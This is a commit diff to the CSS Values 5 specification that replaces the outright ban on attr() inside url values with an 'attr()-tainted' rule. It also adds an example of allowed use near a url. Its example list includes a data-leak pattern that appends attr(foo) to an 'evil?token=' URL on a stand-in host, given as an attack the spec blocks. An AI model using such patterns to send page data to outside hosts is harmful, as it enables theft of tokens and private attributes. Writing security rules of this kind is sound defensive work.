[css-values-5] Fix attr() security to be clearer about invalidation time, and reduce the tainting scope to individual values.

Author: tabatkins

css-values-5/Overview.bs

@@ -1556,12 +1556,15 @@ Security</h4>
 	to a hostile party,
 	if 3rd-party CSS is allowed at all.
 
-	For this reason,
-	''attr()'' does not have a <css>url</css> type.
-	Additionally, ''attr()'' is not allowed to be used
-	in any <<url>> value,
-	whether directly or indirectly.
-	Doing so makes the property it's used in invalid.
+	To guard against this,
+	the values produced by an ''attr()'' are considered <dfn export lt="attr()-taint">attr()-tainted</dfn>,
+	as are functions that contain an [=attr()-tainted=] value.
+	[=Registered custom properties=] containing ''attr()''
+	maintain the [=attr()-taint=] on their [=attr()-tainted=] values
+	across [=var() substitution=].
+
+	Using an [=attr()-tainted=] value as or in a <<url>>
+	makes a declaration [=invalid at computed-value time=].
 
 	<div class=example>
 		For example,
@@ -1571,6 +1574,13 @@ Security</h4>
 		* ''background-image: image(attr(foo))'' - can't use it in other <<url>>-taking functions.
 		* ''background-image: src(string("http://example.com/evil?token=" attr(foo)))'' - can't "launder" it thru another function.
 		* ''--foo: attr(foo); background-image(src(var(--foo)))'' (assuming that ''--foo'' is a [=registered custom property=] with string syntax) - can't launder the value thru another property, either.
+
+		However, using ''attr()'' for other purposes is fine,
+		even if the usage is <em>near</em> a url:
+
+		* ''background-image: image("foo.jpg", attr(bgcolor <color>))'' is fine;
+			the ''attr()'' is providing a fallback color,
+			and the <<url>> isn't [=attr()-tainted=].
 	</div>
 
 	Note: Implementing this restriction